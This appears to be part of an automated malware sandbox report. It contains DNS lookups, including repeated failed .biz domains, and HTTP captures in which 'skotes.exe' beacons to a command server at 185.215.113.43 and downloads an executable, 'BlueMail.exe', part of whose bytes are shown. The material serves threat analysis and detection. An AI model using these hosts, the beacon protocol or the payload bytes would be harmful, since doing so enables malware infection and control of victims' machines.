Dec 13, 2024 18:53:43.891844988 CET	1.1.1.1	192.168.2.7	0xc1d2	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:44.200567961 CET	1.1.1.1	192.168.2.7	0xad6d	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:44.500945091 CET	1.1.1.1	192.168.2.7	0x2bb	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:01.145546913 CET	1.1.1.1	192.168.2.7	0xd70c	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:01.150604963 CET	1.1.1.1	192.168.2.7	0x2b2a	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 13, 2024 18:54:22.549787045 CET	1.1.1.1	192.168.2.7	0xe5e2	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:22.693129063 CET	1.1.1.1	192.168.2.7	0x26f6	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.137691021 CET	1.1.1.1	192.168.2.7	0x522f	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.140629053 CET	1.1.1.1	192.168.2.7	0x7e5d	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:54:25.140629053 CET	1.1.1.1	192.168.2.7	0x7e5d	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.276501894 CET	1.1.1.1	192.168.2.7	0xfab7	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.286547899 CET	1.1.1.1	192.168.2.7	0xd0fb	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.414661884 CET	1.1.1.1	192.168.2.7	0x1a91	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 13, 2024 18:54:25.425896883 CET	1.1.1.1	192.168.2.7	0x7eab	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 13, 2024 18:54:40.784131050 CET	1.1.1.1	192.168.2.7	0x9da5	No error (0)	fightlsoser.click		104.21.35.43	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:40.784131050 CET	1.1.1.1	192.168.2.7	0x9da5	No error (0)	fightlsoser.click		172.67.213.48	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:43.854243040 CET	1.1.1.1	192.168.2.7	0x975d	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.136619091 CET	1.1.1.1	192.168.2.7	0x4dfa	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.281444073 CET	1.1.1.1	192.168.2.7	0x4fc1	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.422985077 CET	1.1.1.1	192.168.2.7	0x94e4	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.563807964 CET	1.1.1.1	192.168.2.7	0x650d	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.718733072 CET	1.1.1.1	192.168.2.7	0x6e91	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.872128963 CET	1.1.1.1	192.168.2.7	0xfae5	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:45.067583084 CET	1.1.1.1	192.168.2.7	0xf3c4	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:45.263843060 CET	1.1.1.1	192.168.2.7	0x2c6b	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:59.764929056 CET	1.1.1.1	192.168.2.7	0xc3d1	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:59.905735016 CET	1.1.1.1	192.168.2.7	0xc007	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.051671028 CET	1.1.1.1	192.168.2.7	0x730a	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.199667931 CET	1.1.1.1	192.168.2.7	0x9d36	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.339257002 CET	1.1.1.1	192.168.2.7	0x6d5a	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.481201887 CET	1.1.1.1	192.168.2.7	0x61bf	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.629193068 CET	1.1.1.1	192.168.2.7	0xd50b	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.774974108 CET	1.1.1.1	192.168.2.7	0xbd8d	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:01.010767937 CET	1.1.1.1	192.168.2.7	0x9b0b	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:13.921922922 CET	1.1.1.1	192.168.2.7	0x275e	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:13.921922922 CET	1.1.1.1	192.168.2.7	0x275e	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:15.413610935 CET	1.1.1.1	192.168.2.7	0xc8e3	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:15.413610935 CET	1.1.1.1	192.168.2.7	0xc8e3	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:43.110491037 CET	1.1.1.1	192.168.2.7	0xd170	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:43.110491037 CET	1.1.1.1	192.168.2.7	0xd170	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.454030037 CET	1.1.1.1	192.168.2.7	0x9eb8	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:44.454030037 CET	1.1.1.1	192.168.2.7	0x9eb8	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.593019962 CET	1.1.1.1	192.168.2.7	0xe770	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:44.593019962 CET	1.1.1.1	192.168.2.7	0xe770	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.774411917 CET	1.1.1.1	192.168.2.7	0xeaf8	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:44.774411917 CET	1.1.1.1	192.168.2.7	0xeaf8	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:49.045484066 CET	1.1.1.1	192.168.2.7	0x6ea2	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:49.045484066 CET	1.1.1.1	192.168.2.7	0x6ea2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:49.094399929 CET	1.1.1.1	192.168.2.7	0x6ea2	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:55:49.094399929 CET	1.1.1.1	192.168.2.7	0x6ea2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:57:58.704067945 CET	1.1.1.1	192.168.2.7	0x736a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:57:58.704067945 CET	1.1.1.1	192.168.2.7	0x736a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:00.038861036 CET	1.1.1.1	192.168.2.7	0xeb47	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:16.990237951 CET	1.1.1.1	192.168.2.7	0x7dd1	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 13, 2024 18:58:16.990252018 CET	1.1.1.1	192.168.2.7	0x2645	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:23.806847095 CET	1.1.1.1	192.168.2.7	0x280d	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:23.806847095 CET	1.1.1.1	192.168.2.7	0x280d	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:23.806865931 CET	1.1.1.1	192.168.2.7	0x952c	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:31.305053949 CET	1.1.1.1	192.168.2.7	0x95dc	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:31.305294037 CET	1.1.1.1	192.168.2.7	0xc94a	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:31.704813004 CET	1.1.1.1	192.168.2.7	0x2950	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:31.704813004 CET	1.1.1.1	192.168.2.7	0x2950	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:31.890043020 CET	1.1.1.1	192.168.2.7	0x503d	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:33.617223024 CET	1.1.1.1	192.168.2.7	0x1f7	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:33.725208998 CET	1.1.1.1	192.168.2.7	0x100f	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:35.963474989 CET	1.1.1.1	192.168.2.7	0x87e0	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.963474989 CET	1.1.1.1	192.168.2.7	0x87e0	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.964020967 CET	1.1.1.1	192.168.2.7	0x5b84	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.964020967 CET	1.1.1.1	192.168.2.7	0x5b84	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.964039087 CET	1.1.1.1	192.168.2.7	0xf3f8	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 13, 2024 18:58:35.964101076 CET	1.1.1.1	192.168.2.7	0x9406	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 13, 2024 18:58:35.969602108 CET	1.1.1.1	192.168.2.7	0xc2d3	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.969602108 CET	1.1.1.1	192.168.2.7	0xc2d3	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.969809055 CET	1.1.1.1	192.168.2.7	0xe721	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 13, 2024 18:58:36.138534069 CET	1.1.1.1	192.168.2.7	0xbcca	No error (0)	sb.scorecardresearch.com		3.160.188.68	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.138534069 CET	1.1.1.1	192.168.2.7	0xbcca	No error (0)	sb.scorecardresearch.com		3.160.188.19	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.138534069 CET	1.1.1.1	192.168.2.7	0xbcca	No error (0)	sb.scorecardresearch.com		3.160.188.50	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.138534069 CET	1.1.1.1	192.168.2.7	0xbcca	No error (0)	sb.scorecardresearch.com		3.160.188.18	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.143140078 CET	1.1.1.1	192.168.2.7	0x1849	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:36.144664049 CET	1.1.1.1	192.168.2.7	0x872c	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:36.277204037 CET	1.1.1.1	192.168.2.7	0x256b	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:36.366712093 CET	1.1.1.1	192.168.2.7	0xe15f	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:36.419933081 CET	1.1.1.1	192.168.2.7	0x3b68	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 18:58:36.420784950 CET	1.1.1.1	192.168.2.7	0x8fee	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 19:00:19.968643904 CET	1.1.1.1	192.168.2.7	0xcf74	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 19:00:19.968643904 CET	1.1.1.1	192.168.2.7	0xcf74	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.636737108 CET	1.1.1.1	192.168.2.7	0x8e1a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.636737108 CET	1.1.1.1	192.168.2.7	0x8e1a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.636795998 CET	1.1.1.1	192.168.2.7	0xe9f3	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 13, 2024 19:00:34.036696911 CET	1.1.1.1	192.168.2.7	0x8f46	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:34.036696911 CET	1.1.1.1	192.168.2.7	0x8f46	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:34.037000895 CET	1.1.1.1	192.168.2.7	0x83ea	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 13, 2024 19:00:34.650882006 CET	1.1.1.1	192.168.2.7	0xdefb	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 19:00:34.744744062 CET	1.1.1.1	192.168.2.7	0x240	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49835	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:16.807684898 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:53:18.000237942 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49841	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:19.660798073 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:53:21.020936012 CET	1060	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 36 35 0d 0a 20 3c 63 3e 31 30 31 34 38 34 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 38 30 66 35 64 61 61 63 38 35 30 36 31 33 34 34 30 36 30 61 38 30 36 62 34 64 65 64 38 61 62 65 65 65 31 66 62 65 39 37 33 38 37 34 34 36 31 62 66 35 61 65 38 30 32 34 31 35 34 35 30 23 31 30 31 34 38 37 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 34 38 37 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 65 37 31 39 31 34 65 35 34 61 36 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 31 30 31 34 38 38 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 [TRUNCATED] Data Ascii: 365 <c>1014844001+++b5937c1a99d5f9d80f5daac85061344060a806b4ded8abeee1fbe973874461bf5ae802415450#1014878001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1014879001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#1014880001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1014881001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc37a9e4d15ef02ab5e45425197d1aa1daaa8#1014882001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1014883001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1014884001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1014885001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49847	45.11.183.55	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:21.188949108 CET	56	OUT	GET /files/BlueMail.exe HTTP/1.1 Host: 45.11.183.55
Dec 13, 2024 18:53:22.516288996 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:22 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 13 Dec 2024 17:41:29 GMT ETag: "126220-6292a5740451e" Accept-Ranges: bytes Content-Length: 1204768 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 71 5c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 e6 11 00 00 08 00 00 00 00 00 00 1e 04 12 00 00 20 00 00 00 20 12 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 12 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 03 12 00 4b 00 00 00 00 20 12 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 20 72 00 00 00 40 12 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$q\g @ ``K r@ H.text$ `.rsrc @@.reloc@@BHwV (2rp(&.(( 2(o(()rap((o+(,~:rp()o-s.~~*j(rp~o/tFrps(L.s(\Brp~(0N(o8}>(o9v(9}o)&{"}V{o}{{{:o8}2{(
Dec 13, 2024 18:53:22.516302109 CET	1236	IN	Data Raw: 00 2b 2a 56 03 02 7d 14 00 00 04 02 7b 07 00 00 04 16 03 6f 3b 00 00 0a 2a 3e 02 7b 09 00 00 04 03 04 6f 3c 00 00 0a 02 2a 36 02 7b 09 00 00 04 03 6f 3d 00 00 0a 2a 36 02 7b 09 00 00 04 03 6f 3e 00 00 0a 2a 36 02 72 0f 01 00 70 03 28 43 00 00 06 Data Ascii: +V}{o;>{o<6{o=6{o>6rp(C2rp(JFrpr%p( V}{oB*(&&6s().('&fohsC(+RisC(+>{oH*{
Dec 13, 2024 18:53:22.516311884 CET	448	IN	Data Raw: 00 00 0a 73 92 00 00 0a 80 90 00 00 0a 7e 90 00 00 0a 28 09 00 00 2b 28 0a 00 00 2b 2a 1e 02 7b 8e 00 00 0a 2a b6 02 7b 8e 00 00 0a 03 6f 93 00 00 0a 39 0e 00 00 00 02 7b 8e 00 00 0a 03 04 6f 99 00 00 0a 2a 02 7b 8e 00 00 0a 03 04 6f 96 00 00 0a Data Ascii: s~(+(+{{o9{o{ooF{oo2{o{o9{o){o9{o)6{o~{o9{o
Dec 13, 2024 18:53:22.516362906 CET	1236	IN	Data Raw: 3a 11 00 00 00 14 fe 06 bd 00 00 0a 73 be 00 00 0a 80 bc 00 00 0a 7e bc 00 00 0a 73 bf 00 00 0a 2a 22 02 03 73 bf 00 00 0a 2a 8e 02 7b b7 00 00 0a 03 7b b7 00 00 0a 6f c0 00 00 0a 02 7b b8 00 00 0a 03 7b b8 00 00 0a 6f c1 00 00 0a 2a 3a 02 7b b7 Data Ascii: :s~s"s{{o{{o:{ovs}s}(,*V(,}}b{{sob{{soR+s(+*%:&~X{8o
Dec 13, 2024 18:53:22.516375065 CET	1236	IN	Data Raw: 6f 49 01 00 0a 2a ca 04 25 3a 06 00 00 00 26 7e 58 00 00 04 10 02 05 25 3a 06 00 00 00 26 7e 58 00 00 04 10 03 02 7b 56 01 00 0a 05 6f 57 01 00 0a 03 04 6f 58 01 00 0a 2a 5a 02 7b 56 01 00 0a 7e 58 00 00 04 6f 57 01 00 0a 6f 59 01 00 0a 2a 5e 02 Data Ascii: oI%:&~X%:&~X{VoWoXZ{V~XoWoY^{V~XoWoZ:s([6{VoW%:&~X%:&~X{VoWo\6(]o6(]o^F{V~XoW^{V~XoW
Dec 13, 2024 18:53:22.516386032 CET	1236	IN	Data Raw: 00 00 04 72 79 05 00 70 6f 26 00 00 06 72 7b 02 00 70 03 6f 43 00 00 06 72 87 05 00 70 04 6f 43 00 00 06 2a 32 02 7b 79 00 00 04 6f a6 01 00 0a 2a 4e 03 02 7b 81 00 00 04 02 7b 82 00 00 04 6f a7 01 00 0a 2a 8a 03 02 7b 83 00 00 04 28 4f 00 00 0a Data Ascii: rypo&r{poCrpoC2{yoN{{o{(O{(O(zood&6rpoCZrpoC&jrprpoC&rpor{pr%poC&(+&*r{pr7po
Dec 13, 2024 18:53:22.516391039 CET	1236	IN	Data Raw: 3b 00 33 6e 00 0f 00 00 00 00 02 00 2f 00 4e 7d 00 0f 00 00 00 00 02 00 1e 00 76 94 00 0d 00 00 00 00 13 30 03 00 7e 00 00 00 00 00 00 00 02 73 31 00 00 0a 7d 07 00 00 04 02 73 32 00 00 0a 7d 08 00 00 04 02 73 33 00 00 0a 7d 09 00 00 04 02 7e 16 Data Ascii: ;3n/N}v0~s1}s2}s3}~:fs4~s5}s6}~7}}}}(,0s\|}0AG/>(
Dec 13, 2024 18:53:22.516402006 CET	1236	IN	Data Raw: 4b 00 00 0a 6f 5e 00 00 0a 02 28 5e 00 00 06 3a 10 00 00 00 07 7b 21 00 00 04 72 5b 01 00 70 6f 5c 00 00 0a 07 7b 21 00 00 04 6f 5d 00 00 0a 07 7b 21 00 00 04 11 05 6f 5e 00 00 0a 02 7b 13 00 00 04 39 11 00 00 00 02 7b 13 00 00 04 07 7b 21 00 00 Data Ascii: Ko^(^:{!r[po\{!o]{!o^{9{{!oA0~:(K~7oa9)(G:(H:(I9(K(G9oN(N&8{oNsooD0
Dec 13, 2024 18:53:22.516412973 CET	1236	IN	Data Raw: 00 0a 2a 03 72 35 01 00 70 6f 5c 00 00 0a 03 6f 5d 00 00 0a 2a 00 13 30 03 00 65 00 00 00 00 00 00 00 02 73 2c 00 00 0a 7d 86 00 00 0a 02 7e 87 00 00 0a 3a 11 00 00 00 14 fe 06 88 00 00 0a 73 89 00 00 0a 80 87 00 00 0a 7e 87 00 00 0a 7d 8a 00 00 Data Ascii: r5po\o]0es,}~:s~}~:s~}(,}*0l{o:N{%({o:{o{o9(
